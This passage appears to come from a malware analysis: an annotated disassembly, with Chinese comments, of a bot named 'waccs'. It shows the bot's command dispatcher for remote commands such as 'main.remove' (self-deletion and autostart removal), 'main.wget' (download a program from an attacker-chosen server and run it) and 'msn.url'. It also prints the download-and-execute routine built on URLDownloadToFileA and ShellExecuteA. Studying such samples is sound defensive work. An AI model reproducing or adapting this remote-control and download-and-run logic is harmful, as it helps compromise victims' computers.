SS:[EBP-4] 00401933 83BC85 64FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-19C],0 0040193B 75 05 JNZ SHORT waccs.00401942 0040193D E9 51050000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401942 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401945 05 EC000000 ADD EAX,0EC 0040194A 50 PUSH EAX 0040194B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 0040194E FFB485 60FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-1A0] 00401955 E8 61250000 CALL waccs.00403EBB ; 数据处理. 0040195A 59 POP ECX 0040195B 59 POP ECX 0040195C 85C0 TEST EAX,EAX 0040195E 74 05 JE SHORT waccs.00401965 00401960 E9 2E050000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401965 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401968 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 0040196F 68 DD341F7F PUSH 7F1F34DD 00401974 8D8D A0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B60] 0040197A E8 D70F0000 CALL waccs.00402956 ; ASCII "main.remove" 0040197F 50 PUSH EAX 00401980 E8 1D570000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"main.remove"). 00401985 59 POP ECX 00401986 59 POP ECX 00401987 F7D8 NEG EAX 00401989 1BC0 SBB EAX,EAX 0040198B 40 INC EAX 0040198C 8885 ACF4FFFF MOV BYTE PTR SS:[EBP-B54],AL 00401992 8D8D A0F4FFFF LEA ECX,DWORD PTR SS:[EBP-B60] 00401998 E8 01070000 CALL waccs.0040209E ; 清除内存数据. 0040199D 0FB685 ACF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B54] 004019A4 85C0 TEST EAX,EAX 004019A6 74 4A JE SHORT waccs.004019F2 ; 判断是否该执行"main.remove"命令. 004019A8 68 34BB33D5 PUSH D533BB34 004019AD 8D8D 90F4FFFF LEA ECX,DWORD PTR SS:[EBP-B70] 004019B3 E8 FE0F0000 CALL waccs.004029B6 ; ASCII "QUIT :Removing" 004019B8 50 PUSH EAX 004019B9 FF75 08 PUSH DWORD PTR SS:[EBP+8] 004019BC E8 3FF6FFFF CALL waccs.00401000 ; 构造发送数据包. 004019C1 59 POP ECX 004019C2 59 POP ECX 004019C3 8D8D 90F4FFFF LEA ECX,DWORD PTR SS:[EBP-B70] 004019C9 E8 90050000 CALL waccs.00401F5E ; 清除内存数据. 004019CE FF15 E8814000 CALL DWORD PTR DS:[4081E8] ; WS2_32.WSACleanup(清除WinSock库函数). 004019D4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004019D7 FFB0 0C010000 PUSH DWORD PTR DS:[EAX+10C] 004019DD FF15 74804000 CALL DWORD PTR DS:[408074] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 004019E3 6A 00 PUSH 0 004019E5 E8 86270000 CALL waccs.00404170 ; 删除病毒在注册表中的启动项. 004019EA 59 POP ECX 004019EB E8 1D260000 CALL waccs.0040400D ; 主病毒体程序文件执行自我删除. 004019F0 EB 60 JMP SHORT waccs.00401A52 004019F2 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004019F5 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 004019FC 68 843DBF83 PUSH 83BF3D84 00401A01 8D8D 80F4FFFF LEA ECX,DWORD PTR SS:[EBP-B80] 00401A07 E8 0A100000 CALL waccs.00402A16 ; ASCII "msn.stop" 00401A0C 50 PUSH EAX 00401A0D E8 90560000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.stop"). 00401A12 59 POP ECX 00401A13 59 POP ECX 00401A14 F7D8 NEG EAX 00401A16 1BC0 SBB EAX,EAX 00401A18 40 INC EAX 00401A19 8885 8CF4FFFF MOV BYTE PTR SS:[EBP-B74],AL 00401A1F 8D8D 80F4FFFF LEA ECX,DWORD PTR SS:[EBP-B80] 00401A25 E8 9C060000 CALL waccs.004020C6 ; 清除内存数据. 00401A2A 0FB685 8CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B74] 00401A31 85C0 TEST EAX,EAX 00401A33 74 1D JE SHORT waccs.00401A52 ; 判断. 00401A35 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401A38 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401A3F 74 11 JE SHORT waccs.00401A52 ; 判断. 00401A41 6A 00 PUSH 0 00401A43 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401A46 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401A4C FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401A52 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401A55 83BC85 68FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-198],0 00401A5D 75 05 JNZ SHORT waccs.00401A64 00401A5F E9 2F040000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401A64 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401A67 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 00401A6E 68 C2143DAE PUSH AE3D14C2 00401A73 8D8D 70F4FFFF LEA ECX,DWORD PTR SS:[EBP-B90] 00401A79 E8 F80F0000 CALL waccs.00402A76 ; ASCII "main.wget" 00401A7E 50 PUSH EAX 00401A7F E8 1E560000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"main.wget"). 00401A84 59 POP ECX 00401A85 59 POP ECX 00401A86 F7D8 NEG EAX 00401A88 1BC0 SBB EAX,EAX 00401A8A 40 INC EAX 00401A8B 8885 7CF4FFFF MOV BYTE PTR SS:[EBP-B84],AL 00401A91 8D8D 70F4FFFF LEA ECX,DWORD PTR SS:[EBP-B90] 00401A97 E8 52060000 CALL waccs.004020EE ; 清除内存数据. 00401A9C 0FB685 7CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B84] 00401AA3 85C0 TEST EAX,EAX 00401AA5 74 78 JE SHORT waccs.00401B1F ; 判断是否该执行"main.wget"命令. 00401AA7 80A5 58FDFFFF 0>AND BYTE PTR SS:[EBP-2A8],0 00401AAE 68 04010000 PUSH 104 00401AB3 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401AB6 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-198] 00401ABD 8D85 59FDFFFF LEA EAX,DWORD PTR SS:[EBP-2A7] 00401AC3 50 PUSH EAX 00401AC4 E8 D3550000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401AC9 83C4 0C ADD ESP,0C 00401ACC 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401ACF 8985 60FEFFFF MOV DWORD PTR SS:[EBP-1A0],EAX 00401AD5 8D85 58FDFFFF LEA EAX,DWORD PTR SS:[EBP-2A8] 00401ADB 50 PUSH EAX 00401ADC 6A 00 PUSH 0 00401ADE 68 143A4000 PUSH waccs.00403A14 00401AE3 E8 AE550000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00403A14).(线程功能：下载骇客指定远程服务器站点的其它程序，并自动调用运行). 00401AE8 83C4 0C ADD ESP,0C 00401AEB 83A5 54FDFFFF 0>AND DWORD PTR SS:[EBP-2AC],0 00401AF2 EB 0D JMP SHORT waccs.00401B01 00401AF4 8B85 54FDFFFF MOV EAX,DWORD PTR SS:[EBP-2AC] 00401AFA 40 INC EAX 00401AFB 8985 54FDFFFF MOV DWORD PTR SS:[EBP-2AC],EAX 00401B01 0FB685 58FDFFFF MOVZX EAX,BYTE PTR SS:[EBP-2A8] 00401B08 85C0 TEST EAX,EAX 00401B0A 75 13 JNZ SHORT waccs.00401B1F 00401B0C 83BD 54FDFFFF 5>CMP DWORD PTR SS:[EBP-2AC],50 00401B13 7D 0A JGE SHORT waccs.00401B1F 00401B15 6A 19 PUSH 19 00401B17 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401B1D ^ EB D5 JMP SHORT waccs.00401AF4 00401B1F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B22 83BC85 70FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-190],0 00401B2A 75 05 JNZ SHORT waccs.00401B31 00401B2C E9 62030000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401B31 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B34 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 00401B3B 68 4378F788 PUSH 88F77843 00401B40 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0] 00401B46 E8 8B0F0000 CALL waccs.00402AD6 ; ASCII "msn.self" 00401B4B 50 PUSH EAX 00401B4C E8 51550000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.self"). 00401B51 59 POP ECX 00401B52 59 POP ECX 00401B53 F7D8 NEG EAX 00401B55 1BC0 SBB EAX,EAX 00401B57 40 INC EAX 00401B58 8885 6CF4FFFF MOV BYTE PTR SS:[EBP-B94],AL 00401B5E 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0] 00401B64 E8 5D050000 CALL waccs.004020C6 ; 清除内存数据. 00401B69 0FB685 6CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B94] 00401B70 85C0 TEST EAX,EAX 00401B72 0F84 52010000 JE waccs.00401CCA ; 判断是否该执行"msn.self"命令. 00401B78 68 20040000 PUSH 420 00401B7D 6A 00 PUSH 0 00401B7F 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC] 00401B85 50 PUSH EAX 00401B86 E8 AF540000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401B8B 83C4 0C ADD ESP,0C 00401B8E 80A5 34F9FFFF 0>AND BYTE PTR SS:[EBP-6CC],0 00401B95 68 04010000 PUSH 104 00401B9A 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B9D FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-198] 00401BA4 8D85 41FCFFFF LEA EAX,DWORD PTR SS:[EBP-3BF] 00401BAA 50 PUSH EAX 00401BAB E8 EC540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BB0 83C4 0C ADD ESP,0C 00401BB3 68 04010000 PUSH 104 00401BB8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BBB FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX4-194] 00401BC2 8D85 39FAFFFF LEA EAX,DWORD PTR SS:[EBP-5C7] 00401BC8 50 PUSH EAX 00401BC9 E8 CE540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BCE 83C4 0C ADD ESP,0C 00401BD1 68 04010000 PUSH 104 00401BD6 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BD9 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-190] 00401BE0 8D85 3DFBFFFF LEA EAX,DWORD PTR SS:[EBP-4C3] 00401BE6 50 PUSH EAX 00401BE7 E8 B0540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BEC 83C4 0C ADD ESP,0C 00401BEF 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BF2 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-18C],0 00401BFA 74 41 JE SHORT waccs.00401C3D 00401BFC 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BFF 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-188],0 00401C07 74 34 JE SHORT waccs.00401C3D 00401C09 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401C0C FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-18C] 00401C13 E8 78540000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401C18 59 POP ECX 00401C19 8985 48FDFFFF MOV DWORD PTR SS:[EBP-2B8],EAX 00401C1F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401C22 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-188] 00401C29 E8 62540000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401C2E 59 POP ECX 00401C2F 69C0 60EA0000 IMUL EAX,EAX,0EA60 00401C35 8985 4CFDFFFF MOV DWORD PTR SS:[EBP-2B4],EAX 00401C3B EB 14 JMP SHORT waccs.00401C51 00401C3D C785 48FDFFFF 0>MOV DWORD PTR SS:[EBP-2B8],1 00401C47 C785 4CFDFFFF F>MOV DWORD PTR SS:[EBP-2B4],0FA 00401C51 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C54 8985 50FDFFFF MOV DWORD PTR SS:[EBP-2B0],EAX 00401C5A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C5D 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401C64 74 11 JE SHORT waccs.00401C77 00401C66 6A 00 PUSH 0 00401C68 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C6B FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401C71 FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401C77 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC] 00401C7D 50 PUSH EAX 00401C7E 6A 00 PUSH 0 00401C80 68 FE4C4000 PUSH waccs.00404CFE 00401C85 E8 0C540000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00404CFE).(线程功能：建立连接，访问远程网站信息，下载和删除指定文件等操作). 00401C8A 83C4 0C ADD ESP,0C 00401C8D 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00401C90 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX 00401C96 83A5 30F9FFFF 0>AND DWORD PTR SS:[EBP-6D0],0 00401C9D EB 0D JMP SHORT waccs.00401CAC 00401C9F 8B85 30F9FFFF MOV EAX,DWORD PTR SS:[EBP-6D0] 00401CA5 40 INC EAX 00401CA6 8985 30F9FFFF MOV DWORD PTR SS:[EBP-6D0],EAX 00401CAC 0FB685 34F9FFFF MOVZX EAX,BYTE PTR SS:[EBP-6CC] 00401CB3 85C0 TEST EAX,EAX 00401CB5 75 13 JNZ SHORT waccs.00401CCA 00401CB7 83BD 30F9FFFF 5>CMP DWORD PTR SS:[EBP-6D0],50 00401CBE 7D 0A JGE SHORT waccs.00401CCA 00401CC0 6A 19 PUSH 19 00401CC2 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401CC8 ^ EB D5 JMP SHORT waccs.00401C9F 00401CCA 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401CCD 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-18C],0 00401CD5 75 05 JNZ SHORT waccs.00401CDC 00401CD7 E9 B7010000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401CDC 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401CDF FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 00401CE6 68 D7A57E24 PUSH 247EA5D7 00401CEB 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC] 00401CF1 E8 400E0000 CALL waccs.00402B36 ; ASCII "msn.url" 00401CF6 50 PUSH EAX 00401CF7 E8 A6530000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.url"). 00401CFC 59 POP ECX 00401CFD 59 POP ECX 00401CFE F7D8 NEG EAX 00401D00 1BC0 SBB EAX,EAX 00401D02 40 INC EAX 00401D03 8885 5CF4FFFF MOV BYTE PTR SS:[EBP-BA4],AL 00401D09 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC] 00401D0F E8 C2020000 CALL waccs.00401FD6 ; 清除内存数据. 00401D14 0FB685 5CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-BA4] 00401D1B 85C0 TEST EAX,EAX 00401D1D 0F84 70010000 JE waccs.00401E93 ; 判断是否该执行"msn.url"命令. 00401D23 68 20040000 PUSH 420 00401D28 6A 00 PUSH 0 00401D2A 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0] 00401D30 50 PUSH EAX 00401D31 E8 04530000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401D36 83C4 0C ADD ESP,0C 00401D39 80A5 10F5FFFF 0>AND BYTE PTR SS:[EBP-AF0],0 00401D40 68 04010000 PUSH 104 00401D45 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D48 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-198] 00401D4F 8D85 1DF8FFFF LEA EAX,DWORD PTR SS:[EBP-7E3] 00401D55 50 PUSH EAX 00401D56 E8 41530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D5B 83C4 0C ADD ESP,0C 00401D5E 68 04010000 PUSH 104 00401D63 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D66 FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX4-194] 00401D6D 8D85 11F5FFFF LEA EAX,DWORD PTR SS:[EBP-AEF] 00401D73 50 PUSH EAX 00401D74 E8 23530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D79 83C4 0C ADD ESP,0C 00401D7C 68 04010000 PUSH 104 00401D81 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D84 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-190] 00401D8B 8D85 15F6FFFF LEA EAX,DWORD PTR SS:[EBP-9EB] 00401D91 50 PUSH EAX 00401D92 E8 05530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D97 83C4 0C ADD ESP,0C 00401D9A 68 04010000 PUSH 104 00401D9F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DA2 FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-18C] 00401DA9 8D85 19F7FFFF LEA EAX,DWORD PTR SS:[EBP-8E7] 00401DAF 50 PUSH EAX 00401DB0 E8 E7520000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401DB5 83C4 0C ADD ESP,0C 00401DB8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DBB 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-188],0 00401DC3 74 41 JE SHORT waccs.00401E06 00401DC5 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DC8 83BC85 7CFEFFFF>CMP DWORD PTR SS:[EBP+EAX4-184],0 00401DD0 74 34 JE SHORT waccs.00401E06 00401DD2 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DD5 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-188] 00401DDC E8 AF520000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401DE1 59 POP ECX 00401DE2 8985 24F9FFFF MOV DWORD PTR SS:[EBP-6DC],EAX 00401DE8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DEB FFB485 7CFEFFFF PUSH DWORD PTR SS:[EBP+EAX4-184] 00401DF2 E8 99520000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401DF7 59 POP ECX 00401DF8 69C0 60EA0000 IMUL EAX,EAX,0EA60 00401DFE 8985 28F9FFFF MOV DWORD PTR SS:[EBP-6D8],EAX 00401E04 EB 14 JMP SHORT waccs.00401E1A 00401E06 C785 24F9FFFF 0>MOV DWORD PTR SS:[EBP-6DC],1 00401E10 C785 28F9FFFF F>MOV DWORD PTR SS:[EBP-6D8],0FA 00401E1A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E1D 8985 2CF9FFFF MOV DWORD PTR SS:[EBP-6D4],EAX 00401E23 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E26 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401E2D 74 11 JE SHORT waccs.00401E40 00401E2F 6A 00 PUSH 0 00401E31 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E34 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401E3A FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401E40 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0] 00401E46 50 PUSH EAX 00401E47 6A 00 PUSH 0 00401E49 68 FE4C4000 PUSH waccs.00404CFE 00401E4E E8 43520000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00404CFE).(线程功能：建立连接，访问远程网站信息，下载和删除指定文件等操作). 00401E53 83C4 0C ADD ESP,0C 00401E56 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00401E59 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX 00401E5F 83A5 0CF5FFFF 0>AND DWORD PTR SS:[EBP-AF4],0 00401E66 EB 0D JMP SHORT waccs.00401E75 00401E68 8B85 0CF5FFFF MOV EAX,DWORD PTR SS:[EBP-AF4] 00401E6E 40 INC EAX 00401E6F 8985 0CF5FFFF MOV DWORD PTR SS:[EBP-AF4],EAX 00401E75 0FB685 10F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF0] 00401E7C 85C0 TEST EAX,EAX 00401E7E 75 13 JNZ SHORT waccs.00401E93 00401E80 83BD 0CF5FFFF 5>CMP DWORD PTR SS:[EBP-AF4],50 00401E87 7D 0A JGE SHORT waccs.00401E93 00401E89 6A 19 PUSH 19 00401E8B FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401E91 ^ EB D5 JMP SHORT waccs.00401E68 00401E93 5F POP EDI 00401E94 C9 LEAVE 00401E95 C3 RETN ; 返回. 下载骇客指定远程服务器站点的其它程序，并自动调用运行： 00403A14 55 PUSH EBP 00403A15 8BEC MOV EBP,ESP 00403A17 81EC 6C030000 SUB ESP,36C 00403A1D 56 PUSH ESI 00403A1E 57 PUSH EDI 00403A1F 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] 00403A22 6A 43 PUSH 43 00403A24 59 POP ECX 00403A25 8DBD F0FDFFFF LEA EDI,DWORD PTR SS:[EBP-210] 00403A2B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00403A2D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00403A30 8985 E8FCFFFF MOV DWORD PTR SS:[EBP-318],EAX 00403A36 8B85 E8FCFFFF MOV EAX,DWORD PTR SS:[EBP-318] 00403A3C C600 01 MOV BYTE PTR DS:[EAX],1 00403A3F FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00403A45 50 PUSH EAX 00403A46 E8 01360000 CALL waccs.0040704C ; JMP 到 msvcrt.srand 00403A4B 59 POP ECX 00403A4C 68 04010000 PUSH 104 00403A51 6A 00 PUSH 0 00403A53 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403A59 50 PUSH EAX 00403A5A E8 DB350000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00403A5F 83C4 0C ADD ESP,0C 00403A62 68 04010000 PUSH 104 00403A67 6A 00 PUSH 0 00403A69 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403A6F 50 PUSH EAX 00403A70 E8 C5350000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00403A75 83C4 0C ADD ESP,0C 00403A78 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403A7E 50 PUSH EAX 00403A7F 68 04010000 PUSH 104 00403A84 FF15 A4804000 CALL DWORD PTR DS:[4080A4] ; kernel32.GetTempPathA 00403A8A E8 B7350000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00403A8F 99 CDQ 00403A90 6A 09 PUSH 9 00403A92 59 POP ECX 00403A93 F7F9 IDIV ECX 00403A95 52 PUSH EDX 00403A96 E8 AB350000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00403A9B 99 CDQ 00403A9C 6A 09 PUSH 9 00403A9E 59 POP ECX 00403A9F F7F9 IDIV ECX 00403AA1 52 PUSH EDX 00403AA2 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403AA8 50 PUSH EAX 00403AA9 68 D95B0021 PUSH 21005BD9 00403AAE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328] 00403AB4 E8 6C090000 CALL waccs.00404425 00403AB9 50 PUSH EAX 00403ABA 68 04010000 PUSH 104 00403ABF 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403AC5 50 PUSH EAX 00403AC6 E8 75350000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00403ACB 83C4 18 ADD ESP,18 00403ACE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328] 00403AD4 E8 9DE5FFFF CALL waccs.00402076 00403AD9 6A 00 PUSH 0 00403ADB 6A 00 PUSH 0 00403ADD 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403AE3 50 PUSH EAX 00403AE4 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F] 00403AEA 50 PUSH EAX 00403AEB 6A 00 PUSH 0 00403AED E8 C2360000 CALL waccs.004071B4 ; JMP 到 urlmon.URLDownloadToFileA 00403AF2 8985 E4FCFFFF MOV DWORD PTR SS:[EBP-31C],EAX 00403AF8 83BD E4FCFFFF 0>CMP DWORD PTR SS:[EBP-31C],0 00403AFF 75 6A JNZ SHORT waccs.00403B6B 00403B01 6A 00 PUSH 0 00403B03 6A 00 PUSH 0 00403B05 6A 00 PUSH 0 00403B07 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403B0D 50 PUSH EAX 00403B0E 68 AC9D4000 PUSH waccs.00409DAC ; ASCII "open" 00403B13 6A 00 PUSH 0 00403B15 FF15 74814000 CALL DWORD PTR DS:[408174] ; SHELL32.ShellExecuteA 00403B1B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403B21 50 PUSH EAX 00403B22 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F] 00403B28 50 PUSH EAX 00403B29 68 B49D4000 PUSH waccs.00409DB4 00403B2E 68 B89D4000 PUSH waccs.00409DB8 00403B33 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00403B39 05 D3000000 ADD EAX,0D3 00403B3E 50 PUSH EAX 00403B3F 68 D32B4F0A PUSH 0A4F2BD3 00403B44 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C] 00403B4A E8 36090000 CALL waccs.00404485 00403B4F 50 PUSH EAX 00403B50 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 00403B56 E8 A5D4FFFF CALL waccs.00401000 00403B5B 83C4 1C ADD ESP,1C 00403B5E 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C] 00403B64 E8 FC060000 CALL waccs.00404265 00403B69 EB 40 JMP SHORT waccs.00403BAB 00403B6B 68 E09D4000 PUSH waccs.00409DE0 00403B70 68 E49D4000 PUSH waccs.00409DE4 00403B75 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00403B7B 05 D3000000 ADD EAX,0D3 00403B80 50 PUSH EAX 00403B81 68 4AF075C1 PUSH C175F04A 00403B86 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C] 00403B8C E8 54090000 CALL waccs.004044E5 00403B91 50 PUSH EAX 00403B92 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 00403B98 E8 63D4FFFF CALL waccs.00401000 00403B9D 83C4 14 ADD ESP,14 00403BA0 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C] 00403BA6 E8 E2060000 CALL waccs.0040428D 00403BAB 5F POP EDI 00403BAC 5E POP ESI 00403BAD C9 LEAVE 00403BAE C3 RETN ; 返回. 建立连接，访问远程网站信息，下载和删除指定文件等操作： 00404CFE 55 PUSH EBP 00404CFF 8BEC MOV EBP,ESP 00404D01 B8 5C190000 MOV EAX,195C 00404D06 E8 55230000 CALL waccs.00407060 00404D0B 56 PUSH ESI 00404D0C 57 PUSH EDI 00404D0D 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] 00404D10 B9 08010000 MOV ECX,108 00404D15 8DBD 3CE8FFFF LEA EDI,DWORD PTR SS:[EBP-17C4] 00404D1B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00404D1D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00404D20 8985 28E8FFFF MOV DWORD PTR SS:[EBP-17D8],EAX 00404D26 8B85 28E8FFFF MOV EAX,DWORD PTR SS:[EBP-17D8] 00404D2C C600 01 MOV BYTE PTR DS:[EAX],1 00404D2F 83A5 68EEFFFF 0>AND DWORD PTR SS:[EBP-1198],0 00404D36 6A 63 PUSH 63 00404D38 59 POP ECX 00404D39 33C0 XOR EAX,EAX 00404D3B 8DBD 6CEEFFFF LEA EDI,DWORD PTR SS:[EBP-1194] 00404D41 F3:AB REP STOS DWORD PTR ES:[EDI] 00404D43 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004] 00404D49 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX 00404D4F 68 04010000 PUSH 104 00404D54 6A 00 PUSH 0 